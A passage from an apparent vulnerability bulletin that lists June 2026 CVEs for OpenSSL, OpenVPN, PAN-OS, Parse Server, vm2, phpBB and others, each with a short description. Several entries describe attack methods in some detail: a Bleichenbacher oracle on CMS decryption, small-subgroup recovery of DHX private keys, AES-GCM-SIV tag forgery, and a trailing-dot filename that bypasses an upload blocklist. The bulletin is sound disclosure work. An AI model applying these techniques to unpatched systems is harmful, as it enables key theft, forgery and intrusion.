use this as an oracle to obtain key equivalent functionality for the CEK used for the chosen recipient of the message. In another use case, an attacker can reduce the tag length of the chosen AEAD cipher for a given AuthEnvelopedData container to be a single byte long, allowing an attacker to brute force CMS decryption, producing an integrity bypass for applications that trust CMS_decrypt() to reject modified content. The FIPS modules are not affected by this issue. | 2026-06-09 | not yet calculated | CVE-2026-34182 |
| OpenSSL--OpenSSL | Issue summary: Remote peer may exhaust heap memory of the QUIC server or client by flooding it with packets containing PATH_CHALLENGE frames. Impact summary: A malicious remote peer can cause an unbounded memory allocation which can lead to an abnormal termination of the application acting as a QUIC client or server and a Denial of Service. A remote peer may exhaust heap memory by flooding the local QUIC stack with PATH_CHALLENGE frames. The local QUIC stack allocates a PATH_RESPONSE frame for every PATH_CHALLENGE it receives. The allocated PATH_RESPONSE frame gets freed only when the remote peer acknowledges reception of the PATH_RESPONSE frame which will not be done by a malicious peer. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue. The QUIC stack is outside of OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-34183 |
| OpenSSL--OpenSSL | Issue summary: A malicious server can exploit TLS OCSP stapling by delivering a crafted response through the status_request extension, triggering a double-free in the client's certificate verification path. Impact summary: Successful exploitation allows an attacker to corrupt heap memory via a double-free, potentially leading to a Denial of Service or possibly an attacker controlled code execution or other undefined behavior. If OCSP stapling is enabled and the TLS client connects to a malicious server, a crafted OCSP stapled response can trigger a double free in the TLS client when the stapled response is checked. The OCSP stapling is not enabled by default. Reliable code execution through a double-free is technically complex and highly environment-dependent but the Denial of Service impact is straightforward to achieve, warranting Moderate severity. No FIPS modules are affected by this issue as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-35188 |
| OpenSSL--OpenSSL | Issue summary: Receiving a QUIC initial packet with an invalid token may trigger a NULL pointer dereference in the OpenSSL QUIC server with address validation disabled. Impact summary: NULL pointer dereference typically causes abnormal termination of the affected QUIC server process and a Denial of Service. If the address validation is disabled in the OpenSSL QUIC server implementation, an attacker can crash the server by sending an initial packet with an invalid or expired token. By default, the client address validation is enabled in the OpenSSL QUIC server implementation, which makes the default configuration not vulnerable to this issue. However if the SSL_LISTENER_FLAG_NO_VALIDATE is used with the SSL_new_listener() call, the address validation is disabled making the vulnerable code reachable. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42764 |
| OpenSSL--OpenSSL | Issue summary: When a partial-chain certificate verification is enabled together with OCSP response checking for the whole chain, a NULL dereference will happen if the verified chain does not have a self-signed trusted anchor, crashing the process. Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application. When performing OCSP response checking for certificates in the verification chain, the code always tries to access the next certificate as the issuer. There is a check for a self-signed certificate. However with the partial chain verification enabled when the chain does not have a self-signed trusted anchor, the issuer will be NULL for the last certificate in the chain. A NULL pointer dereference then happens. This issue affects only applications which enable both OCSP verification of the certificate chain (X509_V_FLAG_OCSP_RESP_CHECK_ALL) and partial chain verification (X509_V_FLAG_PARTIAL_CHAIN) in the certificate verification. Both flags are disabled by default. For that reason, we have assigned Low severity to the issue. No FIPS modules are affected by this issue as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42765 |
| OpenSSL--OpenSSL | Issue summary: A specially crafted password-encrypted CMS message can trigger a NULL pointer dereference during CMS decryption. Impact summary: This NULL pointer dereference leads to an application crash and a Denial of Service. The CMS PasswordRecipientInfo.keyDerivationAlgorithm field is defined as OPTIONAL in the ASN.1 specification and may therefore be absent in specially crafted inputs. During the password-based CMS decryption the OpenSSL CMS implementation dereferences this field without first checking whether it was present. An attacker who supplies such a CMS message to an application performing password-based CMS decryption can trigger an application crash, leading to a Denial of Service. Applications that process password-encrypted CMS messages may be affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42766 |
| OpenSSL--OpenSSL | Issue summary: An attacker-controlled CMP (Certificate Management Protocol) server could trigger a NULL pointer dereference in a CMP client application. Impact summary: A NULL pointer dereference causes a crash of the application and a Denial of Service. An attacker controlling a CMP server (or acting as a man-in-the-middle) could craft a CMP response containing a CRMF (Certificate Request Message Format) CertRepMessage with an EncryptedValue structure where the symmAlg field has an algorithm OID but no parameters field. When the OpenSSL CMP client processes this response, the NULL dereference occurs, causing a crash of the CMP client. Applications that process untrusted CMP/CRMF messages may be affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42767 |
| OpenSSL--OpenSSL | Issue summary: The CMS_decrypt and PKCS7_decrypt functions are vulnerable to Bleichenbacher-style attack when an attacker is able to provide the CMS or S/MIME messages and observe the error code and/or decryption output. Impact summary: The Bleichenbacher-style attack allows an attacker to use the victim's vulnerable application as a way to decrypt or sign messages with the victim's private RSA key. The attack is possible in 2 variants. 1. The decryption API (CMS_decrypt(), PKCS7_decrypt()) is used without providing the recipient certificate. In this case OpenSSL iterates over every KeyTransRecipientInfo (KTRI) without stopping at the first success. An attacker who authors a message with two KTRI entries - the first one wrapping a real CEK under the victim's public key, the second with an arbitrary probe ciphertext - obtains opportunity to iterate the 2nd KTRI to get a valid PKCS#1 v1.5 padding if the error code of the application is available. That is a Bleichenbacher oracle (Bleichenbacher, CRYPTO '98): an adaptive-chosen-ciphertext side channel from which the attacker decrypts any RSA ciphertext to the victim's key or forges any PKCS#1 v1.5 signature under it. 2. When the decryption API (CMS_decrypt(), PKCS7_decrypt()) is provided with the recipient certificate, and the recipient is not found, a random key is substituted. An attacker who authors a message and is able to compare both error code and the result of the decryption, can mount a Bleichenbacher oracle. We are not aware of any applications that provide a remote attacker an opportunity to mount an attack described in these scenarios. We consider the existence of such application very unlikely, and for this reason this CVE has been evaluated as Low severity. To avoid these attacks, when RSA PKCS#1 v1.5 Key Transport is in use, the invoked EVP_PKEY_decrypt() will use the implicit rejection mechanism described in draft-irtf-cfrg-rsa-guidance. In previous OpenSSL releases the implicit rejection was explicitly disabled. The implicit rejection mechanism always returns a plaintext value, the symmetric key. This result is deterministic for the ciphertext and the private key. The length of the decryption result can happen to match the length of the key of the symmetric cipher that was used for the content encryption. When a certificate is not provided, the last RecipientInfo producing a key that looks valid will be used. It may cause getting garbage content on decryption. As a proper way to deal with this a recipient certificate has to be provided to identify the particular RecipientInfo for decryption. The FIPS modules in 4.0, 3.6, 3.5, and 3.4 are not affected by this issue, as CMS and S/MIME processing happens outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42768 |
| OpenSSL--OpenSSL | Issue Summary: An error in the callback used to verify the certificate provided in a Root CA key update Certificate Management Protocol (CMP) message response rendered the certificate validation ineffectual, which could lead to escalation of credentials from the Registration Authority (RA) level to the root Certification Authority (root CA) level. Impact Summary: The Registration Autority could replace the root CA certificate for the CMP clients with an arbitrary root CA certificate. One of the parts of the Certificate Management Protocol (CMP), specified in RFC 9810, is Root Certification Authority (root CA) key Rollover, which is sent by the server in a message with type 'id-it-rootCaKeyUpdate'. As part of these messages, 'newWithOld' certificate, the new root CA certificate signed with the old root CA key, is provided, and verifying its signature is crucial for transferring the trust from the old CA key to the new one. The 'id-it-rootCaKeyUpdate' messages are expected to be processed with OSSL_CMP_get1_rootCaKeyUpdate(), that is expected to verify the 'newWithOld' certificate. A typo in the certificate chain building code led to adding an incorrect certificate ('newWithOld' instead of 'oldRoot') to the certificate chain, rendering the certificate verification process ineffectual (only the issuer name and the algorithm OIDs were verified by other parts of the verification code). An attacker who already has credentials that satisfy the CMP message protection checks can generate a new key pair and use a crafted self-signed certificate in its 'id-it-rootCaKeyUpdate' CMP messages which affected CMP clients would accept as a new trust anchor. Significant preconditions for the attack (having valid RA-level credentials) are the reason the issue was assigned Low severity. The FIPS modules are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42769 |
| OpenSSL--OpenSSL | Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the peer key is not properly checked for the subgroup membership. Impact summary: A malicious peer which presents an X9.42 key carrying the victim's p and g parameters, a forged q = r (a small prime factor of the cofactor (p−1)/q_local), and a public value Y of order r can recover the victim's private key after a small number of key exchange attempts. When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the subgroup membership check Y^q ≡ 1 (mod p) is performed using the peer's own q parameter, not the local key's q. The peer's domain parameters are then matched against the domain parameters of the private key, but the value of q is not compared. A malicious peer who presents an X9.42 key carrying the victim's p, g, a forged q = r (a small prime factor of the cofactor), and a public value Y of order r passes all checks. The shared secret then takes only r distinct values, leaking priv mod r. Repeating for each small-prime factor of the cofactor and combining via CRT recovers the full private key (Lim-Lee / small-subgroup-confinement attack). The realistic attack surface is narrow: principally CMP deployments with long-lived RA/CA DHX keys and bespoke enterprise or government applications using X9.42 DHX static keys with interactive protocols and therefore this issue was assigned Low severity. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are affected by this issue. | 2026-06-09 | not yet calculated | CVE-2026-42770 |
| OpenSSL--OpenSSL | Issue summary: When the X509_VERIFY_PARAM_set1_email is called by an application to validate a crafted e-mail address, such as during S/MIME message validation, an out of bounds read can happen. Impact summary: This out of bounds read will not directly exfiltrate the data read to the attacker so the most likely result is a crash and a Denial of Service. An internal helper function called from X509_VERIFY_PARAM_[set|add]_email() used a wrong length when validating the local part of an email address. This could cause the 64 octet limit on the local part of an email address to be not enforced, or cause an out of bound read and potentially a crash. The bug is reachable via S-MIME validation with a crafted From: address supplied in an email message that can potentially cause a crash. No FIPS modules are affected by this issue as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-42771 |
| OpenSSL--OpenSSL | Issue summary: When an application drives an AES-OCB context through the public EVP_Cipher() one-shot interface, the application-supplied initialisation vector (IV) is silently discarded. Impact summary: Every message encrypted under the same key uses the same effective nonce regardless of the IV supplied by the caller, resulting in (key, nonce) reuse and loss of confidentiality. If the same code path is used to compute the authentication tag, the tag depends only on the (key, IV) pair and not on the plaintext or ciphertext, allowing universal forgery of arbitrary ciphertext from a single captured message. OpenSSL provides two ways to drive a cipher: the documented streaming interface (EVP_CipherUpdate / EVP_CipherFinal_ex) and a lower-level one-shot, EVP_Cipher(), whose documentation explicitly recommends against use by applications in favour of EVP_CipherUpdate() and EVP_CipherFinal_ex(). The OCB provider's streaming handler flushes the application-supplied IV into the OCB context before processing data; the one-shot handler did not. Every call to EVP_Cipher() on an AES-OCB context therefore ran with the all-zero key-derived offset state left by cipher initialisation, regardless of the caller's IV. If EVP_EncryptFinal_ex() is subsequently used to obtain the authentication tag, the deferred IV setup runs at that point and clears the running checksum that should have been accumulated over the plaintext. The resulting tag is a function of (key, IV) only and verifies against any ciphertext produced under the same (key, IV) pair. The OpenSSL SSL/TLS implementation is not affected: AES-OCB is not a TLS cipher suite, and libssl does not call EVP_Cipher() in any case. Applications that drive AES-OCB through the documented streaming AEAD API (EVP_CipherUpdate / EVP_CipherFinal_ex) are not affected. Only applications that combine the AES-OCB cipher with the EVP_Cipher() one-shot API are vulnerable. The FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue, as AES-OCB is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-45445 |
| OpenSSL--OpenSSL | Issue summary: The implementations of AES-SIV (RFC 5297) and AES-GCM-SIV (RFC 8452) mishandle the authentication of AAD (Additional Authenticated Data) with an empty ciphertext allowing a forgery of such messages. Impact summary: An attacker can forge empty messages with arbitrary AAD to the victim's application using these ciphers. AES-SIV (RFC 5297) and AES-GCM-SIV (RFC 8452) are nonce-misuse-resistant AEAD modes: they accept a key, nonce, optional AAD (bytes that are authenticated but not encrypted), and plaintext, and produces ciphertext plus a 16-byte tag. On decrypt, `EVP_DecryptFinal_ex()` is documented to return success only if the tag is verified succesfully. In OpenSSL's provider implementation of these ciphers, the expected tag is computed only when decryption function is invoked with non-empty data. If the caller supplies AAD and then calls `EVP_DecryptFinal_ex()` without invocation of the ciphertext update, which can happen when the received ciphertext length is zero, the tag is never recalculated and still holds its all-zeros value. When AES-GCM-SIV is used, an attacker who sends arbitrary AAD, empty ciphertext, and all-zeros tag passes authentication under any key they do not know, single-shot. When AES-SIV is used, for mounting the attack it's necessary for the application to reuse the decryption context without resetting the key. AES-SIV is implemented since OpenSSL 3.0. AES-GCM-SIV is implemented since OpenSSL 3.2. No protocols implemented in OpenSSL itself (TLS/CMS/PKCS7/HPKE/QUIC) support either AES-GCM-SIV or AES-SIV. To mount an attack, the applications must implement their own protocol and use the EVP interface. Also they must skip the ciphertext update when a message with an empty ciphertext arrives. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as these algorithms are not FIPS approved and the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-45446 |
| OpenSSL--OpenSSL | Issue summary: A specially crafted PKCS#7 or S/MIME signed message could trigger a use-after-free during PKCS#7 signature verification. Impact summary: A use-after-free may result in process crashes, heap corruption, or potentially remote code execution. When processing a PKCS#7 or S/MIME signed message, if the SignedData digestAlgorithms field is present as an empty ASN.1 SET, OpenSSL may incorrectly free a caller-owned BIO during PKCS7_verify(). A subsequent use of the BIO by the calling application results in a use-after-free condition. In the common case this occurs when the application later calls BIO_free() on the BIO originally passed to PKCS7_verify(). Depending on allocator behavior and application-specific BIO usage patterns, this may result in a crash or other memory corruption. In some application contexts this may potentially be exploitable for remote code execution. Applications that process PKCS#7 or S/MIME signed messages using OpenSSL PKCS#7 APIs may be affected. Applications using the CMS APIs for this processing are not affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-45447 |
| OpenSSL--OpenSSL | Issue summary: A signed integer overflow when sizing the destination buffer for Unicode output in ASN1_mbstring_ncopy() can lead to a heap buffer overflow. Impact summary: A heap buffer overflow may lead to a crash or possibly attacker controlled code execution or other undefined behaviour. In ASN1_mbstring_copy() and ASN1_mbstring_ncopy() the destination size for Unicode output is computed in a signed int: by left shift of the input character count for BMPSTRING (UTF-16) and UNIVERSALSTRING (UTF-32), and by summing per-character byte counts for UTF8STRING. The calculation overflows when the input reaches around 2^30 characters. In the worst case (UNIVERSALSTRING at 2^30 characters) the size wraps to zero, OPENSSL_malloc(1) is called, and the subsequent character copy writes several gigabytes past the one-byte allocation. X.509 certificate processing routes through ASN1_STRING_set_by_NID(), whose DIRSTRING_TYPE mask excludes UNIVERSALSTRING and whose per-NID size limits cap the input length; no network protocol or certificate-handling path in OpenSSL exercises the overflow. Triggering the bug requires an application that calls ASN1_mbstring_copy() or ASN1_mbstring_ncopy() directly, or registers a custom string type via ASN1_STRING_TABLE_add(), with attacker-controlled input on the order of half a gigabyte or more. For these reasons this issue was assigned Low severity. The FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-7383 |
| OpenSSL--OpenSSL | Issue summary: When CMS password-based decryption (RFC 3211 / PWRI key unwrap) processes attacker-supplied CMS data, an attacker-chosen stream-mode KEK cipher can trigger a heap out-of-bounds read in kek_unwrap_key(). Impact summary: A heap buffer over-read may trigger a crash which leads to Denial of Service for an application if the input buffer ends at a memory page boundary and the following page is unmapped. There is no information disclosure as the over-read bytes are not revealed to the attacker. The key unwrapping function performs a check-byte test as specified in the RFC that reads 7 bytes from a heap allocation that is based on the wrapped key length from the message. There is a minimum length check based on the block length of the wrapping cipher. However the cipher is selected from an OID carried in the attacker's PWRI keyEncryptionAlgorithm with no requirement that the cipher be a block cipher. When an attacker selects a stream-mode cipher the guard will be ineffective and the allocated buffer containing the unwrapped key can be too small to fit the check-bytes specified in the RFC and a buffer over-read can happen. Applications calling CMS_decrypt() or CMS_decrypt_set1_password() (equivalently openssl cms -decrypt -pwri_password ...) on untrusted CMS data are vulnerable to this issue. No password knowledge is required: the over-read happens during the unwrap attempt before any authentication succeeds. The over-read is limited to a few bytes and is not written to output, so there is no information disclosure. Triggering a crash requires the allocation to border unmapped memory, which is unlikely with the normal allocator. The FIPS modules are not affected by this issue. | 2026-06-09 | not yet calculated | CVE-2026-9076 |
| openvm-org--openvm | OpenVM is a performant and modular zkVM framework built for customization and extensibility. Prior to version 1.6.0, the openvm-pairing guest library's try_honest_pairing_check function invokes Theorem 3 of https://eprint.iacr.org/2024/640.pdf but does not check that the scaling factor s is in a proper subfield of Fp12. This allows incorrect results to the pairing check. This issue has been patched in version 1.6.0. | 2026-06-10 | not yet calculated | CVE-2026-46669 |
| OpenVPN--OpenVPN | Improper validation of packet length during tls-crypt-v2 key extraction in OpenVPN 2.6.0 through 2.6.19 and 2.7_alpha1 through 2.7.1 allows authenticated attackers to trigger a fatal assertion and cause a denial of service via a specially crafted packet. | 2026-06-08 | not yet calculated | CVE-2026-35058 |
| OpenVPN--OpenVPN | A race condition in OpenVPN 2.6.0 through 2.6.19 and 2.7_alpha1 through 2.7.1 allows remote attackers to potentially cause a server crash or leak heap memory via a use-after-free triggered during TLS session promotion. | 2026-06-08 | not yet calculated | CVE-2026-40215 |
| OpenVPN--ovpn-dco-win | An incorrect buffer size calculation in the epoch key generator in OpenVPN ovpn-dco-win version 2.0.0 through 2.8.3 allows a remote authenticated peer to trigger a heap-based buffer overflow and kernel memory corruption via a crafted data packet, resulting in a system crash (denial of service). | 2026-06-10 | not yet calculated | CVE-2026-11604 |
| Oracle Corporation--OracleLinux(7.2) shim | Multiple Microsoft-sigend UEFI SHIM bootloaders are vulnerable to SecureBoot bypass. An attacker with administrative privileges or the ability to modify the boot process could use one of the vulnerable shim bootloaders to bypass Secure Boot protections and execute arbitrary code before the operating system loads. Specific UEFI DBX update is required to block these vulnerable boot loaders. | 2026-06-09 | not yet calculated | CVE-2026-8863 |
| OS4ED--openSIS-Classic | openSIS Classic 9.3 contains an insecure direct object reference vulnerability in the messaging module. Any authenticated user with access to the messaging module can request sent-message details from modules/messaging/SentMail.php by supplying an arbitrary mail_id value. | 2026-06-11 | not yet calculated | CVE-2026-8406 |
| Palo Alto Networks--Cloud NGFW | A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS® software enables a malicious authenticated administrator to store a JavaScript payload using the web interface. This issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series). Cloud NGFW and Prisma® Access are not affected by this vulnerability. | 2026-06-10 | not yet calculated | CVE-2026-0266 |
| Palo Alto Networks--Cloud NGFW | A memory corruption vulnerability in the processing of tunnel traffic in Palo Alto Networks PAN-OS® software allows an authenticated user to initiate system reboots using a maliciously crafted packet. Repeated attempts to initiate a reboot causes the firewall to enter maintenance mode. Panorama, Cloud NGFW, and Prisma® Access are not impacted by this vulnerability. | 2026-06-10 | not yet calculated | CVE-2026-0269 |
| Palo Alto Networks--Cloud NGFW | A privilege escalation vulnerability in Palo Alto Networks PAN-OS® software allows an authenticated administrator with access to the Command Line Interface (CLI) to perform actions on the device with root privileges. The security risk posed by this issue is significantly minimized when CLI access is restricted to a limited group of administrators and by restricting access to the management interface to only trusted internal IP addresses according to our recommended best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series). Cloud NGFW, and Prisma® Access are not impacted by this vulnerability. | 2026-06-10 | not yet calculated | CVE-2026-0272 |
| Palo Alto Networks--Cloud NGFW | A command injection vulnerability in Palo Alto Networks PAN-OS® software enables an authenticated administrator to bypass system restrictions and run arbitrary commands as a root user. To be able to exploit this issue, the user must have access to the PAN-OS CLI or Web UI. The security risk posed by this issue is significantly minimized when CLI access is restricted to a limited group of administrators and by restricting access to the management web interface to only trusted internal IP addresses according to our recommended best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series). Cloud NGFW and Prisma® Access are not affected by this vulnerability. | 2026-06-10 | not yet calculated | CVE-2026-0273 |
| Palo Alto Networks--Cortex XSIAM CommvaultSecurityIQ Marketplace | An improper validation of credentials vulnerability in the CommvaultSecurityIQ integration for Cortex XSOAR and Cortex XSIAM allows an unauthenticated attacker to access and modify protected resources. | 2026-06-10 | not yet calculated | CVE-2026-0274 |
| Palo Alto Networks--Cortex XSOAR | A path traversal vulnerability in Palo Alto Networks Cortex XSOAR engine software running on Linux allows an unauthenticated attacker on an adjacent network, with the ability to intercept and manipulate network response traffic via a man-in-the-middle (MITM) attack, to write arbitrary files to the host. | 2026-06-10 | not yet calculated | CVE-2026-0270 |
| Palo Alto Networks--GlobalProtect App | An information exposure vulnerability in the Palo Alto Networks GlobalProtect app on macOS enables a local user to learn the configured passcodes for disabling, disconnecting, or uninstalling the GlobalProtect app. After the passcode is known, the user can perform these actions even if the GlobalProtect app configuration would not normally permit them to do so. | 2026-06-10 | not yet calculated | CVE-2026-0267 |
| Palo Alto Networks--Prisma Access Agent | A security control bypass vulnerability in Prisma Access Agent for Linux allows a local attacker to route network traffic outside the VPN tunnel. This does not impact Prisma Access Agent on Windows, macOS, iOS, Android, or ChromeOS. | 2026-06-10 | not yet calculated | CVE-2026-0268 |
| Palo Alto Networks--Prisma Access Agent | A privilege escalation (PE) vulnerability in the Palo Alto Networks Prisma Access Agent app on Linux devices enables a local user to execute code with elevated privileges. This does not impact Prisma Access Agent on Windows, macOS, iOS, Android, or ChromeOS. | 2026-06-10 | not yet calculated | CVE-2026-0271 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.77 and 9.9.1-alpha.1, an unauthenticated attacker who knows a publicly-known Parse Application ID can submit a single HTTP request whose client SDK version field contains adversarial input that triggers polynomial backtracking in a request-header parser. The parsing runs before session authentication and before rate limiting on every /parse/* request, so the request consumes seconds to minutes of synchronous CPU on a Node.js worker before any access control evaluates it. A small number of concurrent requests can saturate a worker; a single large request via the body-field variant can pin a worker for minutes. Production deployments running the default configuration are affected. This issue has been patched in versions 8.6.77 and 9.9.1-alpha.1. | 2026-06-12 | not yet calculated | CVE-2026-47138 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.78 and 9.9.1-alpha.2, Parse Server's GraphQL endpoint discloses schema metadata to unauthenticated callers through Did you mean ...? suggestions embedded in GraphQL validation-error messages. An unauthenticated caller who knows only the public application id can iteratively send malformed queries to reconstruct class names, field names, argument names, mutation names, and input-object fields. This issue has been patched in versions 8.6.78 and 9.9.1-alpha.2. | 2026-06-12 | not yet calculated | CVE-2026-47248 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. From version 9.8.0 to before version 9.9.1-alpha.3, the routeAllowList server option restricts external client access to a configured list of REST API routes. The check is only enforced as Express middleware against the outer HTTP request URL, so the /batch handler dispatches each sub-request to the internal router without re-running the allow-list check. An external caller whose outer route matches batch can issue batch sub-requests to any REST API route that the operator omitted from the allow-list. Authentication, ACL, CLP, and other inner-route authorization controls still apply - only the operator-configured route firewall is bypassed. This issue has been patched in version 9.9.1-alpha.3. | 2026-06-12 | not yet calculated | CVE-2026-50008 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.79 and 9.9.1-alpha.4, the default file upload extension blocklist can be bypassed by appending a trailing dot to a filename whose extension would otherwise be blocked (e.g. poc.svg.). The trailing dot causes the extension parser to extract an empty string, which short-circuits the blocklist check, and the attacker-controlled Content-Type is forwarded to the storage adapter unchanged. Storage adapters that persist and serve the provided Content-Type (such as S3 or GCS) then serve the file with an active type such as image/svg+xml, enabling stored XSS when a victim opens the file URL. The default GridFS adapter is not affected because it sets X-Content-Type-Options: nosniff on responses. This issue has been patched in versions 8.6.79 and 9.9.1-alpha.4. | 2026-06-12 | not yet calculated | CVE-2026-53724 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. From version 9.8.0 to before version 9.9.1-alpha.5, apps that enable MFA and deny get on the _User class via Class-Level Permissions could expose sensitive user data through the /login and /verifyPassword endpoints. These endpoints re-fetch the user through the access-controlled query pipeline (CLP, protectedFields, auth-adapter sanitizers) before responding. When that re-fetch was denied by the _User get permission, the server fell back to the raw database row, exposing raw authData (including MFA TOTP secrets and recovery codes) and fields hidden by protectedFields (when protectedFieldsOwnerExempt is false). /verifyPassword is the most severe: with only a username and password (no session or MFA token), an attacker who knows a victim's password could retrieve their MFA secret and recovery codes, defeating the second factor. This issue has been patched in version 9.9.1-alpha.5. | 2026-06-12 | not yet calculated | CVE-2026-53725 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.80 and 9.9.1-alpha.6, a relation query using the $relatedTo operator could read the membership of a Relation field even when that field was hidden from the requesting client by protectedFields, and even when the object owning the relation was not readable by the client under its ACL or class-level permissions. The request requires only the public API credentials that Parse clients normally carry - no user session, master key, or Cloud Code is needed. As a result, an unauthenticated client who knows or obtains the owning object's objectId could enumerate the objects linked through a protected relation, or combine the operator with an objectId constraint to use it as a membership oracle - confirming whether a specific object is linked to a private parent. This affects applications that rely on protectedFields or object ACLs to keep Relation membership confidential, such as private group memberships, block lists, or account-to-resource associations. This issue has been patched in versions 8.6.80 and 9.9.1-alpha.6. | 2026-06-12 | not yet calculated | CVE-2026-53726 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, NodeVM exposes some process-wide observability builtins when they are allowed through require.builtin. The diagnostics_channel, async_hooks, and perf_hooks builtins are not blocked by the dangerous builtin denylist. These modules are process-wide, not sandbox-local. Sandboxed code can use them to observe host application data across the vm2 boundary. This issue has been patched in version 3.11.4. | 2026-06-12 | not yet calculated | CVE-2026-47141 |
| PenguinMod--PenguinMod-BackendApi | PenguinMod-BackendApi is the backend api for penguinmod. Prior to version 1.0.0, a NoSQL injection vulnerability in the password reset endpoint allows any authenticated user to change the password of an account, leading to full account takeover. An attacker only needs a registered account and a valid password reset token for their own account. This issue has been patched in version 1.0.0. | 2026-06-11 | not yet calculated | CVE-2026-47181 |
| PEVANS--Metrics::Any::Adapter::DogStatsd | Metrics::Any::Adapter::DogStatsd versions before 0.04 for Perl does not protect against metric injections. The statsd protocol (and extensions such as dogstatsd) allow mutiple metrics,separated by newlines, to be sent per packet. Metrics::Any::Adapter::DogStatsd which extends Metrics::Any::Adapter::Statsd, which has a similar vulnerability. In addition, the _tags function does not check tags for newlines or statsd control characters. The tags can be used for metric injections. | 2026-06-10 | not yet calculated | CVE-2026-50638 |
| PEVANS--Metrics::Any::Adapter::SignalFx | Metrics::Any::Adapter::SignalFx versions before 0.04 for Perl does not protect against metric injections. The statsd protocol (and extensions such as dogstatsd) allow mutiple metrics,separated by newlines, to be sent per packet. Metrics::Any::Adapter::SignalFx which extends Metrics::Any::Adapter::Statsd, which has a similar vulnerability. In addition, the _labels function does not check tags labels newlines or statsd control characters. The labels can be used for metric injections. | 2026-06-10 | not yet calculated | CVE-2026-50639 |
| PEVANS--Metrics::Any::Adapter::Statsd | Metrics::Any::Adapter::Statsd versions before 0.04 for Perl does not protect against metric injections. The statsd protocol (and extensions) allow mutiple metrics,separated by newlines, to be sent per packet. The send method does not validate the contents of the metric names or values. If the names have newlines and statsd control characters (colon, pipe) then metric injections are possible. Version 0.04 fixed this by modifying the _make method to block metric names with characters below ASCII 32 (which includes the newline), or colons or pipes. | 2026-06-10 | not yet calculated | CVE-2026-50637 |
| phpBB--phpBB | Improper verification of access permissions when modifying permissions through the Administration Control Panel (ACP) allowed an authenticated administrator to grant permissions beyond the level authorized for their account, resulting in privilege escalation within the administrative interface. | 2026-06-12 | not yet calculated | CVE-2026-47366 |
| phpBB--phpBB | Improper authentication checks in the OAuth implementation allow account hijacking even when OAuth is not configured or enabled leading to unauthorized access in default installations. | 2026-06-12 | not yet calculated | CVE-2026-48611 |
| phpBB--phpBB | Improper state verification in the OAuth implementation could allow an attacker to manipulate the authentication flow and cause a victim's account to be linked to an attacker-controlled account. This can result in unauthorized account linking and potential account takeover. | 2026-06-12 | not yet calculated | CVE-2026-48612 |
| phpBB--phpBB | SQL injection vulnerability in phpBB profile field migration due to improper handling of user-supplied profile field data during migration, allowing execution of arbitrary SQL queries. Only applies to phpBB forums that had been updated from versions prior to phpBB 3.3.8 and have not been updated to 3.3.11 or newer yet. | 2026-06-12 | not yet calculated | CVE-2026-48613 |
| Ping Identity--PingDirectory | Virtual attribute handling in Ping Identity PingDirectory in affected versions allows only authorized users to exhaust java memory heap when recent login history is enabled and copying virtual attributes that reference ds-privilege-name values. | 2026-06-12 | not yet calculated | CVE-2026-20746 |
| Plonky3--Plonky3 | Plonky3 is a toolkit for polynomial IOPs (PIOPs). Prior to versions 0.4.3 and 0.5.3, an attacker controlling prover-side observations can craft distinct transcripts that produce identical challenges, breaking the binding property of Fiat-Shamir. This issue has been patched in versions 0.4.3 and 0.5.3. | 2026-06-10 | not yet calculated | CVE-2026-46654 |
